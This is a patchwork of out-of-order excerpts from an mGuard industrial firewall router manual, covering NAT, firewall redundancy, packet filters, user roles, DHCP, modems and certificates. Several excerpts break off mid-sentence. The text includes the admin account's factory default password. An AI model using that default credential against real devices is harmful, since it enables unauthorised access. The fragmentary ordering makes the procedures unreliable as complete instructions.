The mGuard claims the IP addresses entered for the External network for the devices in its Local network. The mGuard returns ARP answers for all addresses from the specified External network on behalf of the devices in the Local network. Therefore, the IP addresses entered under External network must not be used. They must not be assigned to other devices or used in any way, as an IP address conflict would otherwise occur in the external network. This even applies when no device exists in the Internal network for one or more IP addresses from the specified External network.

Network >> NAT >> Masquerading

Default settings: 1:1 NAT is not active. 1:1 NAT cannot be applied to the External 2 interface. 1:1 NAT is only used in Router network mode.

Local network: The address of the network on the LAN port.

External network: The address of the network on the WAN port.

Netmask: The subnet mask, as a value between 1 and 32, for the local and external network address (see also CIDR (Classless Inter-Domain Routing) on page 24).

Comment: Can be filled with appropriate comments.

External 2 and Any External are only for devices with a serial interface (mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard centerport, m
...blems can be solved by reducing the MTU to 1496.

6.3 Network >> NAT

6.3.1 Masquerading

(Screenshot: Network >> NAT >> Masquerading, IP and Port Forwarding. Network Address Translation/IP Masquerading: Outgoing on Interface: External; From IP: 0.0.0.0/0. These rules let you specify which IP addresses (normally addresses within the private address space) are to be rewritten to the mGuard's IP address. Please note: These rules won't apply to the Stealth mode. 1:1 NAT: 0.0.0.0, 0.0.0.0, 24, Yes.)

Network >> NAT >> Masquerading

Masquerading: Network Address Translation/IP Masquerading: Lists the rules established for NAT (Network Address Translation). For outgoing data packets, the device can rewrite the specified sender IP addresses from its internal network to its own external address, a technique referred to as NAT (Network Address Translation) (see also NAT (Network Address Translation) in the glossary). This method is used if the internal addresses cannot or should not be routed externally, e.g. because a private address area such as 192.168.x.x or the internal network structure should be hidden.

The method can also be used to hide external network structures from the internal devices. To do so, set the Internal option under Outgoing on Interface. The Internal setting allows for communication between two separate IP networks where the IP devices have not configured a useful default ro
...by the mGuard. Only this router should keep the virtual IP. Otherwise, you can define targets which are accessible via this route in the connectivity check. In this case, the virtual IP address of the router would not be a sensible target.

Redundant group: Several redundant pairs can be connected within a LAN segment (redundant group). You define a value as an identifier through the router ID for each virtual instance of the redundant pair. As long as these identifiers are different, the redundant pairs do not come into conflict with each other.

Data traffic: In the event of a high latency in a network used for state synchronization updates, or a serious data loss on this network, the mGuard on standby is assigned the outdated state. This does not occur, however, as long as no more than two back-to-back updates are lost. This is because the mGuard on standby automatically requests a repeat of the update. The latency requirements are the same as those detailed under Fail-over switching time on page 335.

Sufficient bandwidth: The data traffic generated as a result of the connectivity check, availability check and state synchronization uses bandwidth on the network. The connectivity check also generates complicated calculations. There are several ways to limit this or stop it completely if the influence on other devices is unacceptable: The connectivity che
169. by the other mGuard shortly before it failed. Another effect is that ESP packets sent from the previously active mGuard are dropped by the VPN partner if new ESP packets are received earlier from the mGuard that is currently active. To do this, the latency on the network must differ from the fail-over switching time.

Redundancy

An error interrupts the initial establishment of the ISAKMP SA or IPsec SA: If an error interrupts the initial establishment of the ISAKMP SA or IPsec SA, the mGuard on standby can continue the process seamlessly, as the state of the SA is replicated synchronously. The response to an IKE message is only sent from the active mGuard after the mGuard on standby has confirmed receipt of the corresponding VPN state synchronization update. When an mGuard becomes active, it immediately repeats the last IKE message which should have been sent from the previously active mGuard. This compensates for cases where the previously active mGuard has sent the state synchronization but has failed before it could send the corresponding IKE message. In this way, the establishment of the ISAKMP SA or IPsec SA is only delayed by the switching time during a fail-over.

An error interrupts the renewal of an ISAKMP SA: If an error interrupts the renewal of an ISAKMP SA, this is compensated in the same way as during the initial establishment of the SA. The old ISAKMP SA is
170. c connection expectations: An existing OPC connection may negotiate another connection on a new port. If the Sanity check for OPC classic is activated, these connections must only be OPC connections. The mGuard opens a port for the new connection by adding a temporary firewall rule. After the time set here has elapsed, the firewall rule is removed again. After that, new connections can no longer be established via this port. Existing connections are retained.

8.1.7 Firewall for the mGuard rs2000 3G

The mGuard rs2000 3G has a simple 2-click firewall. This either permits or rejects all incoming and outgoing connections. No advanced settings are provided. Furthermore, access via this firewall is not logged (see Logging >> Browse local logs).

The following firewall functionality is available when using the mGuard rs2000 or mGuard rs2000 3G:

Incoming Rules: Accept all incoming connections; Drop all incoming connections; Accept Ping only. "Accept Ping only" allows all ping packets to pass. The integrated protection against brute force attacks is not effective in this case.

Network Security >> Packet Filter >> Incoming Rules: General firewall setting: Accept all incoming connections / Drop all incoming connections / Accept Ping only.

Outgoing Rules: A
171. cations are required on the computer itself.

Figure 1-1: Stealth mode (Plug-n-Protect)

1.2.2 Network router

When used as a network router, the mGuard can provide the Internet link for several computers and protect the company network with its firewall. One of the following network modes can be used on the mGuard:

Router, if the Internet connection is, for example, via a DSL router or a permanent line.
PPPoE, if the Internet connection is, for example, via a DSL modem and the PPPoE protocol is used (e.g. in Germany).
PPTP, if the Internet connection is, for example, via a DSL modem and the PPTP protocol is used (e.g. in Austria).
Modem, if the Internet connection is via a serially connected modem compatible with the Hayes or AT command set.
Built-in mobile phone modem (mobile phone router), via the integrated mobile phone modem.

For computers in the Intranet, the mGuard must be specified as the default gateway.

Figure 1-2: Network router (DSL modem/router)
172. ccept all outgoing connections; Drop all outgoing connections; Accept Ping only. "Accept Ping only" allows all ping packets to pass. The integrated protection against brute force attacks is not effective in this case.

Network Security >> Packet Filter >> Outgoing Rules: General firewall setting: Accept all outgoing connections / Drop all outgoing connections / Accept Ping only.

These variables are also available on other devices. However, other devices also have advanced settings. See "Incoming rules" on page 206 and "Outgoing rules" on page 208.

Network Security menu

8.2 Network Security >> DoS Protection

8.2.1 Flood Protection

This menu is not available on the mGuard rs2000 3G.

Network Security >> DoS Protection >> Flood Protection:
TCP: Maximum number of new outgoing TCP connections (SYN) per second; Maximum number of new incoming TCP connections (SYN) per second.
ICMP: Maximum number of outgoing ping frames (ICMP Echo Request) per second; Maximum number of incoming ping frames (ICMP Echo Request) per second.
Stealth Mode: Maximum number of outgoing ARP requests or ARP replies per second (each); Maximum number of incoming ARP requests or ARP replies per second (each).

Network Security >> DoS Protection >> Flood Protection: TCP: Maximu
173. ce the connection to the external network can also (or additionally) be established via the serial interface using a modem. Alternatively, the serial interface can also be used as follows: for PPP dial-in into the local network, or for configuration purposes. For devices with a built-in modem (analog modem or ISDN terminal adapter), the modem can be used additionally to combine access options. The details for this must be configured on the General, Ethernet, Dial-out, Dial-in and Modem/Console tab pages. For a more detailed explanation of the options for using the serial interface and a built-in modem, see "Modem/Console" on page 139.

Connecting the network interface: Connect the EAGLE mGuard to the PC via a standard Ethernet patch cable. This ensures a correct connection even when auto MDIX and auto negotiation are switched off. The mGuard platforms have DTE interfaces only (exception: the EAGLE mGuard has a DCE network interface). Connect the mGuards to the DTE interface using an Ethernet crossover cable. Here, auto MDIX is permanently switched on, so it does not matter if the auto negotiation parameter is disabled.

6.1.1 General

Network >> Interfaces: General, Dial-out, Dial-in, Modem/Console. Network Status: External IP address 10.0.95.29; Active Defaultroute via -; Used DNS servers: DNS Root Servers; Internal modem: Offline. Network Mode: Router; Router Mode: static. Network
174. cepted if SNMP access is activated. Drop: all ICMP messages to the mGuard are dropped. Allow ping requests: only ping messages (ICMP type 8) to the mGuard are accepted. Allow all ICMPs: all ICMP message types to the mGuard are accepted.

Yes/No: The GARP VLAN Registration Protocol (GVRP) is used by GVRP-capable switches to exchange configuration information. If this option is set to Yes, GVRP packets are allowed to pass through the mGuard in Stealth mode.

Network Security >> Packet Filter >> Advanced

Allow forwarding of STP frames: Yes/No. The Spanning Tree Protocol (STP, 802.1d) is used by bridges and switches to detect and consider loops in the cabling. If this option is set to Yes, STP packets are allowed to pass through the mGuard in Stealth mode.

Allow forwarding of DHCP frames: Yes/No. When set to Yes, the client is allowed to obtain an IP address via DHCP, regardless of the firewall rules for outgoing data traffic. This option is set to Yes by default.

Connection Tracking: Maximum table size; Allow TCP connections upon SYN only; Timeout for established TCP connections (seconds).

Maximum table size: This entry specifies an upper limit. This is set to a level that can never be reached during normal practical operation. However, it can be easily reached in the event of attacks, thus providing addit
175. ch remote certificate the mGuard should adopt in order to authenticate the partner (SSH client). The remote certificate can be selected from the selection list. The selection list contains the remote certificates that have been loaded on the mGuard under the Authentication >> Certificates menu item.

All users / root / admin / netadmin / audit: Filter which specifies that the SSH client has to be authorized for a specific administration level in order to gain access. When establishing a connection, the SSH client shows its certificate and also specifies the system user for which the SSH session is to be opened (root, admin, netadmin, audit). Access is only granted if the entries match those defined here. Access for all listed system users is possible when "All users" is set. The netadmin and audit setting options relate to access rights with the mGuard device manager.

4.1.4 E-Mail

Management >> System Settings: Host, Time and Date, Shell Access, E-Mail. E-Mail: Sender address of e-mail notifications; Address of the e-mail server; Port number of the e-mail server; Encryption mode for the e-mail server; SMTP Login name; SMTP Password; E-Mail notifications (e.g. State of the Power Supply 1).

Management >> System Settings >> E-Mail: E
176. QoS menu >> Egress Rules >> Internal / External / External 2 / Dial-in; QoS menu >> Egress Rules (VPN) >> VPN via Internal / VPN via External / VPN via External 2 / VPN via Dial-in.

Current TOS/DSCP: Each data packet contains a TOS or DSCP field. TOS stands for Type of Service; DSCP stands for Differentiated Services Code Point. The traffic type to which the data packet belongs is specified here. For example, an IP phone will write a different entry in this field for outgoing data packets compared to an FTP program that uploads data packets to a server. When you select a value here, only the data packets that have this TOS or DSCP value in the corresponding fields are chosen. These values are then set to a different value according to the entry in the "New TOS/DSCP" field.

New TOS/DSCP: If you want to change the TOS/DSCP values of the data packets that are selected using the defined rules, enter the text that should be written in the TOS/DSCP field here.

For a more detailed explanation of the Current TOS/DSCP and New TOS/DSCP options, please refer to the following RFC documents: RFC 3260 "New Terminology and Clarifications for Diffserv"; RFC 3168 "The Addition of Explicit Congestion Notification (ECN) to IP"; RFC 2474 "Definition of the Differentiated Services Field (DS Field)"; RFC 1349 "Type of Service in the Internet Protocol Suite".

Queue Name: Nam
177. ck / Connectivity check / State synchronization: The table starts with the most recent state. The abbreviations are as follows: Firmware started up completely; Firmware not yet started up completely; Valid system time; Invalid system time; Timeout; No timeout; Unknown state; Another mGuard is available, this mGuard is active or is currently being enabled; Another mGuard is available, this mGuard is on standby or is currently switching to standby; No other mGuard available; Unknown state; Check of all components was successful; Check of at least one component has failed; Unknown state; Database is up to date; Database is obsolete; Database switching to on_standby; Database switching to active.

13.2.2 Connectivity Status

Redundancy >> FW Redundancy >> Status: Redundancy Status / Connectivity Status.
External Interface: Summarized result; Ethernet link status; Number of check intervals; Kind of check; Check interval; Timeout per interval and set of targets; Results of the last 16 intervals (youngest first); Results of the primary targets.
Internal Interface: Summarized result; Ethernet link status; Number of check intervals; Kind of check; Check interval; Timeout per interval and set of targets; Results of the last 16 intervals (youngest first).
Values shown: success; connected; N; 65536; 32456; at least one target must respond; 300
178. ck >> Global >> Access: Allowed Networks: Lists the firewall rules that have been set up for SEC-Stick remote access (default rule: From IP 0.0.0.0/0, Interface External, Action Accept, Log No).

If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored. The rules specified here only take effect if "Enable SEC-Stick remote access" is set to Yes. Internal access is also possible when this option is set to No. A firewall rule that would refuse internal access does therefore not apply in this case. Multiple rules can be specified.

From IP: Enter the address of the computer/network from which remote access is permitted or forbidden in this field. IP address 0.0.0.0/0 means all addresses. To specify an address area, use CIDR format (see "CIDR (Classless Inter-Domain Routing)" on page 24).

Interface: External / Internal / External 2 / VPN / Dial-in. Specifies to which interface the rule should apply. If no rules are set or if no rule applies, the following default settings apply: Remote SEC-Stick access is permitted via Internal, VPN and Dial-in. Access via External and External 2 is refused. Specify the access options according to your requirements. If you want to refuse access via Internal, VPN or Dial
179. ck must either be deactivated or must only relate to the actual IP address of the other mGuard. The data traffic generated by the availability check and state synchronization must be moved to a separate VLAN. Switches must be used which allow separation of the VLANs.

Dedicated interface: The mGuard centerport supports a dedicated interface. This is a reserved direct Ethernet interface or a dedicated LAN segment via which the state synchronization is sent. This separates the load physically from the internal LAN segment.

Redundancy

16.1.9 Transmission capacity with firewall redundancy

These values apply to Router network mode when the data traffic for state synchronization is transmitted without encryption. If the transmission capacity described here is exceeded in the event of errors, the switching time may be longer than that set.

Platform / Transmission capacity with firewall redundancy:
mGuard centerport: 1500 Mbps bidirectional, not more than 400,000 frames/s.
mGuard industrial rs, mGuard smart, mGuard core l, mGuard pci (ae MHz), mGuard blade, mGuard delta, EAGLE mGuard: 150 Mbps bidirectional, not more than 12,750 frames/s.
mGuard industrial rs, mGuard smart, mGuard core l, mGuard pci (e MHz), mGuard blade, mGuard delta, EAGLE mGuard: 62 Mbps bidirectional, not more than 5250 frames/s.
mGuard rs4000, mGuard rs4000 3G: 62 Mbps bidirectional, not more than 5
180. com

Limitation of login attempts: In the event of a Denial of Service attack, services are intentionally made unable to function. To prevent this type of attack, the mGuard is provided with a choke for different network requests. This feature is used to count all connections going out from one IP address and using a specific protocol. When counting a specific number of connections without a valid login, the choke becomes effective. If no invalid connection attempt is made for the duration of 30 seconds, the choke is reset. Each new request without valid login from this IP address resets the timer by 30 seconds. The number of connection attempts that need to fail until the choke becomes effective depends on the protocol: 20 when using HTTPS; 6 when using SSH, SNMP, COM server.

2.2 User roles

root: User role without restrictions. admin: Administrator. netadmin: Administrator for the network only. audit: Auditor (tester).

The predefined users root, admin, netadmin and audit have different permissions. The root user has unrestricted access to the mGuard. The admin user also has unrestricted functional access to the mGuard; however, the number of simultaneous SSH sessions is limited. Permissions are explicitly assigned to the netadmin user via the mGuard device manager. This user only has read access to the other functions. Passwords and private keys cannot be read by this user. The audit user only has read acc
181. ction of the mGuard and thus allows for error diagnostics. The alarm output reports the following if it has been activated: Failure of the redundant supply voltage; Monitoring of the link status of the Ethernet connections; Monitoring of the temperature condition; Monitoring of the connection state of the internal modem.

Changes compared to the previous version

3.1.4 OPC Inspector for Deep Packet Inspection for OPC Classic

When using the OPC Classic network protocol, interconnected firewalls virtually have no effect. In addition, conventional NAT routing cannot be used. When activating the OPC Classic function, the OPC packets are monitored (under Network Security >> Packet Filter >> Advanced). The TCP ports that are negotiated during the connection opened first are detected and opened for OPC packets. If no OPC packets are transmitted via these ports within a configurable timeout, they are closed again. If the OPC validity check is activated, only OPC packets must be transmitted via OPC Classic port 135.

3.1.5 Additional functions

Extended DynDNS providers: When establishing VPN connections, it is useful that the devices obtain their IP address via a DynDNS service. In version 8.1, more DynDNS providers are supported.

New mode for Pre-Shared Key authentication method: When selecting the Pre-Shared Key (PSK) authentication met
182. cy Status >> Connectivity Status

Check interval: Shows the time in milliseconds between the starts of the checks. This value is calculated from the set fail-over switching time.

Timeout per interval and set of targets: Shows the time in milliseconds after which a target is classed as "no response" if no response to the ICMP echo request has been received. This value is calculated from the set fail-over switching time.

Waiting time prior to reporting an error: Time the redundancy system ignores an error. The connectivity and availability checks (except for link errors) ignore an error until it is still present after the time set here has elapsed. This value is set under "Waiting time prior to switching" in the Redundancy >> Firewall Redundancy >> Redundancy menu.

Results of the last 16 intervals (youngest first): A green plus indicates a successful check. A red minus indicates a failed check.

Results of the primary targets: Only visible when a primary target is set (see "Primary targets for ICMP echo requests" on page 313). Shows the results of the ICMP echo requests in chronological order. The most recent result is at the front. "sR" indicates a cycle during which ICMP echo requests have been correctly transmitted and received. Missing answers are indicated by a "f", and requests that have not been transmitted are indicated by a "_".

Results of the second... : Only visible when a second
183. d here for the administration of the mGuard. If the "multiple clients" option is selected under Stealth configuration: The client does not answer ARP requests. No client is available. Remote access via HTTPS, SNMP and SSH is only possible using this address. With static Stealth configuration, the Stealth Management IP Address can always be accessed, even if the network card of the client PC has not been activated.

If the secondary external interface is activated (see "Secondary External Interface" on page 116), the following applies: If the routing settings are such that data traffic to the Stealth Management IP Address would be routed via the secondary external interface, this would be an exclusion situation, i.e. the mGuard could no longer be administered locally. To prevent this, the mGuard has a built-in mechanism that ensures that, in such an event, the Stealth Management IP Address can still be accessed by the locally connected computer or network.

Network menu

Network >> Interfaces >> General: Stealth network mode: Static routes; Management IP.

IP addresses: IP address via which the mGuard can be accessed and administered. The IP address 0.0.0.0 deactivates the management IP address. Change the management IP address first before specifying any additional addresses.
Netmask: The subnet mask of the IP address above.
Use VLAN: Yes/No.
IP
184. d out as a reason why the mGuard considers the new configuration to be faulty.

Download timeout: Default: 120 seconds. Specifies the maximum timeout length (period of inactivity) when downloading the configuration file. The download is aborted if this time is exceeded. If and when a new download is attempted depends on the setting of "Pull Schedule" (see above).

Login: Login (user name) that the HTTPS server requests.
Password: Password that the HTTPS server requests.

Server Certificate: The certificate that the mGuard uses to check the authenticity of the certificate shown by the configuration server. It prevents an incorrect configuration from an unauthorized server from being installed on the mGuard. The following may be specified here: a self-signed certificate of the configuration server, or the root certificate of the CA (certification authority) that issued the server certificate. This is valid when the configuration server certificate is signed by a CA instead of self-signed.

Management >> Central Management >> Configuration Pull

Download Test: If the stored configuration profiles also contain the private VPN key for the VPN connection(s) with PSK, the following conditions must be met: The password should consist of at least 30 random upper and lower case letters and numbers to pre
185. d to switch A1 through its external Ethernet interface and to switch A2 through its internal Ethernet interface. mGuard B is connected accordingly to switches B1 and B2. In this way, the switches and mGuard devices connect an external Ethernet network to an internal Ethernet network. The connection is established by forwarding network packets in Router network mode.

Firewall redundancy compensates for errors displayed in Figure 16-2 if only one occurs at any given time. If two errors occur simultaneously, they are only compensated if they occur in the same area (A or B). For example, if one of the mGuard devices fails completely due to a power outage, then this is detected. A connection failure is compensated if the connection fails completely or partially. When the connectivity check is set correctly, a faulty connection caused by the loss of data packets or an excessive latency is detected and compensated. Without the connectivity check, the mGuard cannot determine which area caused the error. A connection failure between switches on a network side (internal/external) is not compensated for (7 and 8 in Figure 16-2).

16.1.7 Handling firewall redundancy in extreme situations

The situations described here only occur rarely.

Restoration in the event of a network lobotomy: A network lobotomy occurs if a redundant pair is separated into two mGuard devices operating independently
186. d with two SIM cards. The SIM card in the SIM 1 slot is the primary SIM card, which is normally used to establish the connection. If this connection fails, the device can turn to the second card in the SIM 2 slot.

The SIM card in slot 1 takes over the mobile network connection in these cases: if the mGuard is restarted; when logging into the mobile network provider again; in the event of an error with the mobile network connection of SIM 2; if there is a timeout, which is set under "Maximum runtime of the fallback SIM until switching back to the primary SIM".

The SIM card in slot 2 takes over the mobile network connection if the connection via SIM 1 fails. The SIM card in slot 2 maintains the mobile network connection until one of the aforementioned cases occurs. If SIM 2 is also unable to establish a mobile network connection, the interval for successive logon attempts is increased to 60 seconds.

Network >> Mobile Network: General, SIM Settings, Text message, Notifications, Positioning system. Fields: State; PIN of the SIM card; Roaming; Access Point Name (APN) of the Provider; PPP authentication; Maximum runtime of the fallback SIM until switching back to the primary SIM. Status shown: Current SIM Slot: Using SIM 2; State: SIM inserted and authorized; Dual SIM state: Fallback mode (Secondary SIM); Roaming: Registered to foreign network; Current Provider: Vodafone de; Primary SIM slot: Activa
187. data packets are considered which: are actually encrypted by the mGuard (the mGuard only forwards packets via the VPN tunnel if they originate from a trustworthy source); originate from a source address within the network which is defined here; have their destination address in the network of the partner (if 1:1 NAT is not set for the partner NAT).

Only one IP address (subnet mask /32) is permitted as the VPN network for this setting. The network to be masqueraded is translated to this IP address. The data packets are then transmitted via the VPN tunnel. Masquerading changes the source address and source port. The original addresses are recorded in an entry in the Conntrack table. Where response packets are received via the VPN tunnel and there is a matching entry in the Conntrack table, these packets have their destination address and destination port written back to them.

IPsec VPN menu

IPsec VPN >> Connections >> Edit >> General

Remote: Here, specify the address of the network or computer which is located downstream of the remote VPN gateway.

Type: Tunnel; Remote 1:1 NAT. Example shown: Remote Tunnel 192.168.1.1/32, 192.168.254.1/32; 1:1 NAT 192.168.2.1.

With 1:1 NAT, the IP addresses of devices of the tunnel partner are exchanged so that each individual address is translated into another specific address. It i
188. ddress is displayed as the Physical Address. Linux: call /sbin/ifconfig or ip link show in a shell.

The following options are available: Client computer MAC address (without spaces or hyphens). Client's IP Address: The static IP address of the computer to be assigned to the MAC address. Static assignments take priority over the dynamic IP address pool. Static assignments must not overlap with the dynamic IP address pool. Do not use one IP address in multiple static assignments; otherwise this IP address will be assigned to multiple MAC addresses. Only one DHCP server should be used per sub-network.

Current Leases: The current IP addresses (leases) for the internal and external DHCP servers assigned by the DHCP server are displayed with MAC address, IP address and timeout.

Network >> DHCP >> Internal DHCP

DHCP mode: Relay. If DHCP mode is set to Relay, the corresponding setting options are displayed below as follows: Network >> DHCP: Internal DHCP / External DHCP; DHCP Mode: DHCP mode: Relay; DHCP Relay Options: DHCP Servers; Append Relay Agent Information (Option 82): No.

DHCP Relay Options: In mGuard Stealth mode, Relay DHCP mode is not supported. If the mGuard is in Stealth mode and Relay DHCP mode is selected, this setting will be ignored. However, DHCP requests f
189. de: Only mGuard rs4000 3G, mGuard rs4000, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard.

Network >> Interfaces: General, Dial-out, Dial-in, Modem/Console. Network Status: External IP address 10.0.0.152; Active Defaultroute via 10.0.0.253; Used DNS servers: DNS Root Servers; Internal modem: Offline. Network Mode: Router; Router Mode: Built-in mobile network modem.

Network >> Interfaces >> General: Router network mode / Modem router mode: Modem / Built-in Modem / Built-in mobile network modem.

Modem network mode is available for mGuard rs4000/rs2000, mGuard centerport, mGuard industrial rs, mGuard blade, EAGLE mGuard, mGuard delta. The Built-in Modem network mode is also available for the mGuard industrial rs if it has a built-in modem or a built-in ISDN terminal adapter (optional). The Built-in mobile network modem mode is also available for the mGuard rs4000 3G and mGuard rs2000 3G.

For all of the devices mentioned above, data traffic is routed via the serial interface and not via the mGuard WAN port when in Modem or Built-in (mobile network) Modem network mode, and from there it continues as follows: A) data traffic is routed via the externally accessible serial interface (serial port), to which an external modem must be connected; B) data traffic is routed via the built-in mobile network modem/built-in ISDN terminal adapter (if available)
190. de 01 is replaced. Configuration backup: Manual; Delete configuration backup of Blade 01; Upload; Download configuration to client.

Blade Control >> Blade xx >> Configuration

Configuration backup: Automatic: the new configuration is stored automatically on the controller shortly after a configuration change on a blade. Manual: the configuration can be stored on the controller by clicking on Backup. Click on Restore to transfer the configuration stored on the controller to the mGuard. If the blade was reconfigured after a manual configuration backup but the new configuration was not saved, the configuration stored on the controller is out of date. This is indicated on the Configuration tab page by "Configuration Obsolete". This indicates that something has been overlooked; in this case you must back up the configuration on the controller.

Configuration: The status of the stored configuration is displayed for each blade: Out of date; Up to date; File copy in progress; Blade change detected; No blade available; Configuration upload to Blade d initiated; Configuration upload to Blade d failed; Configuration download from Blade d initiated; Configuration down...

Reconfiguration if mGuard blade is replaced: After replacing an mGuard in this slot, the configuration stored on the controller is automatically transferred to the new dev
191. de: Active / Inactive / Disabled. Determines the output state of the firewall rule record following a reconfiguration or restart. The Active/Inactive setting is only applicable if a push button is connected. In case the firewall rule records are controlled via a switch or VPN connection, they have priority. If set to Disabled, the firewall rule record cannot be dynamically activated. The firewall rule record is retained but has no influence.

Control: Service input (CMD 1-3) / VPN connection. The firewall rule record can be switched via a push button/switch or a VPN connection. The push button/switch must be connected to one of the service contacts (CMD 1-3).

State: Indicates the current state.
Name: The firewall rule record can be freely named/renamed.
Action: Activate / Deactivate. If set to Deactivate, the rule record is deactivated.
Edit: The following tab page appears when you click on Edit:

Network Security >> Packet Filter >> Rule Record "Regel 1" >> General: A descriptive name for the set: Regel 1; Initial mode: Active; Controlling service input (CMD) or VPN connection: None; Token for text message trigger; Deactivation Timeout: 0 Seconds.

Network Security menu

Network Security >> Packet Filter >> Rule Records

General: A descriptive name for the set: The firewall rule record can be freely named/renamed. Initial mode
192. dem. Default: '' \d\dATH OK. Consult the modem user manual for the initialization sequence for this modem. The initialization sequence is a sequence of character strings expected by the modem and commands that are then sent to the modem so that the modem can establish a connection.

The preset initialization sequence has the following meaning:

'' (two simple quotation marks placed directly after one another): The empty character string inside the quotation marks means that the mGuard does not initially expect any information from the connected modem, but instead sends the following text directly to the modem.
\d\dATH: The mGuard sends this character string to the modem in order to determine whether the modem is ready to accept commands.
OK: Specifies that the mGuard expects the OK character string from the modem as a response to \d\dATH.

On many modem models it is possible to save modem default settings to the modem itself. However, this option should not be used. Initialization sequences should be configured externally instead, i.e. on the mGuard. In the event of a modem fault, the modem can then be replaced quickly and smoothly without changing the modem default settings. If the external modem is to be used for incoming calls without the modem default settings being entered accordingly, then you have to inform the modem that it should accept incoming calls a
193. den from the destination of the data flow. In particular, the destination does not require any routes in order to respond in a data flow of this type, not even a default route (default gateway). Set the firewall in order for the desired connections to be allowed. For incoming and outgoing rules, the source address must still correspond to the original sender if the firewall rules are used. Please observe the outgoing rules when using the External, External 2 or Any External settings (see Outgoing rules on page 208). Please observe the incoming rules when using the Internal setting (see Incoming rules on page 206). From IP: 0.0.0.0/0 means that all internal IP addresses are subject to the NAT procedure. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Comment: Can be filled with appropriate comments. Lists the rules established for 1:1 NAT (Network Address Translation). With 1:1 NAT, the sender IP addresses are exchanged so that each individual address is exchanged with another specific address, and is not exchanged with the same address for all data packets as in IP masquerading. This enables the mGuard to mirror addresses from the internal network to the external network. The mGuard is connected to network 192.168.0.0/24 via its LAN port and to network 10.0.0.0/24 via its WAN port. By using 1:1 NAT, the LAN computer with IP address 192.168.0.8 can
194. der User-defined name servers: The IP addresses of domain name servers can be entered in this list. The mGuard uses this list for communication via the secondary external interface as long as the interface is activated (temporarily) and User defined is specified under DNS Mode (see above) in this case. Network menu. Network Mode: Router (default setting: mGuard rs4000/rs2000 3G, mGuard centerport, mGuard delta, mGuard blade controller). (Screenshot: Network >> Interfaces, tabs General / Dialout / Dial-in / Modem / Console; Network Status: External IP address 10.0.0.152 (Active), Default route via 10.0.0.253, Used DNS servers: DNS Root Servers, Internal modem: Offline; Network Mode: Router, Router Mode: static; External Networks: 10.0.0.152 / 255.255.255.0; Additional External Routes; IP of default gateway: 10.0.0.253; Internal Networks: 192.168.1.1 / 255.255.255.0; Additional Internal Routes; DMZ Networks; Secondary External Interface: Network Mode Off.) When Router is selected as the network mode: see Router mode on Page 125. Network >> Interfaces >> General, Router network mode. Internal Networks, Internal IPs (trusted port): The internal IP is the IP address via which the mGuard can be accessed by devices in the locally connected network. The default settings in Router PP
195. dministrator Password (Account: admin): Grants the rights required for the configuration options accessed via the web-based administrator interface. User name (cannot be modified): admin. Default password: mGuard. Authentication >> Administrative Users >> Passwords: user. Disable VPN until the user is authenticated via HTTP: If a user password has been specified and activated, the user must always enter this password after an mGuard restart in order to enable mGuard VPN connections when attempting to access any HTTP URL. To use this option, specify the new user password in the corresponding entry field. This option is set to No by default. If set to Yes, VPN connections can only be used once a user has logged into the mGuard via HTTP. As long as authentication is required, all HTTP connections are redirected to the mGuard. Changes to this option only take effect after the next restart. User Password: There is no default user password. To set one, enter the desired password in both entry fields. Authentication menu. 7.1.2 RADIUS Filters. (Screenshot: Authentication >> Administrative Users, tabs Passwords / RADIUS Filters; RADIUS Filters for Administrative Access, columns Group Filter ID / Authorized for access as: mGuard admin: admin; mGuard audit: audit.) Group names can be created here
196. e CA Certificates on page 199 and must also be referenced during the configuration of the relevant application (SSH, HTTPS and VPN). Whether both methods are used alternatively or in combination varies depending on the application (VPN, SSH and HTTPS). Restrictions using the Safari browser: Please note that during administrative access to the mGuard via an X.509 certificate using the Safari browser, all sub-CA certificates must be installed in the browser's truststore. Authentication menu. Authentication for SSH: If the partner shows a certificate specific to the individual, signed by a CA, the mGuard authenticates the partner using all CA certificates that form the chain to the root CA certificate together with the certificate shown by the partner, PLUS, if required, remote certificates (if used as a filter). If the partner shows a certificate specific to the individual, self-signed, the mGuard authenticates the partner using the remote certificate. See Management >> System Settings on page 33, Shell Access on page 40. Authentication for HTTPS: If the partner shows a certificate specific to the individual, signed by a CA, the mGuard authenticates the partner using all CA certificates that form the chain to the root CA certificate together with the certificate
197. e OEM Name, OEM Serial Number, Serial Number, Flash ID, Hardware Version, Version Parameterset, Version of the bootloader, Version of the rescue system, Current root filesystem. (Screenshot values as shown: Innominate; mGuard rs2000; e300c3 mpc83xx 1 0 330 MHz; 34.5 °C; 4 min; 126532 kB; 00:0c:be:04:10:3a, 00:0c:be:04:10:3b, 00:0c:be:04:10:3c, 00:0c:be:04:10:3d; mGuard rs2000 TX TX; Innominate; 2030749866; 2030749866; N205d28323633151c1aa2d7cdc9cceae3e5; 00003200; 4; BootLoader 2.3.5 default MGUARD2; Rescue 1.8.1 default; rootfs2.) 15.2.2 Snapshot: This function is used for support purposes. (Screenshot: Support >> Advanced, tabs Hardware / Snapshot; Support Snapshot: This will create a snapshot of the mGuard for support purposes.) Support menu. It creates a compressed file in tar.gz format containing all active configuration settings and log entries that could be relevant for error diagnostics. This file does not contain any private information such as private machine certificates or passwords. However, any pre-shared keys of VPN connections are contained in the snapshots. To create a snapshot, proceed as follows: • Click on Download. • Save the file under the name snapshot.tar.gz. Provide the file to the support team of your dealer if required. Redundancy. 16 Redundancy. The firewall and VPN redu
